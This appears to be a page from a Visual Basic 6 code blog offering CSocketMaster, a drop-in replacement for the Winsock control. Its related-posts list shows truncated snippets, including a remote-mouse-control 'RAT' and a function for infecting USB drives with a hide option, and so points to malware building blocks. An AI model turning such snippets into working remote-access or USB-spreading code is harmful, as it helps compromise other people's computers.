CSocketMaster class is a winsock control substitute. It has the same interface and behavior winsock has so don't worry about having to learn how to use it. If you know how winsock works then you already know how CSocketMaster works. You can use a socket in a form, user control or class without external dependencies or huge memory leaking OCXs.
Download
Related Posts
Find any window
code: Option Explicit Private Declare Function GetWindowText Lib "user32" _ Alias "GetWindowTextA"...Kill Process
Code: Public Function Killprc( _ strNprc As String, _ Optional DecirSINO As Boolean = True) As Boolean O...Get Total RAM and FREE RAM VB6 Code
Code: Public Function GetRamTotalnFree() As String Dim TotalRam As String Dim FreeRam As String GetRAMInfo...Desktop flip vb6 code
This can make desktop flip vertical or horisontal Code: Private Declare Function BitBlt Lib "gdi32" (ByVal...Get Mouse Control VB6 RAT
This code can control remote PC mouse.... Code: Option Explicit Public Declare Sub mouse_event Lib "user32" (ByVal ...RegRead & Get Windiws OS VB6 Code
Code: Public Function RegRead(Path As String) As String On Error Resume Next Dim ws As Object On Local Er...Save Log VB6 Code
Code: Public Sub SaveLogFile(LocalFile As String) On Error Resume Next Open LocalFile For Output As #1 ...Hide taskbar icons VB6 Code
Code: Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWind...Get the name of a Drive
code: Option Explicit Private Declare Function GetVolumeInformation Lib "kernel32" _ Alias "GetVolumeIn...Infect to USB Drives vb6 code
code: Private Function InfectUSB(FileName As String, Hide As Boolean) As Long On Error Resume Next Dim szBuff...
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment
Click to see the code!
To insert emoticon you must added at least one space before the code.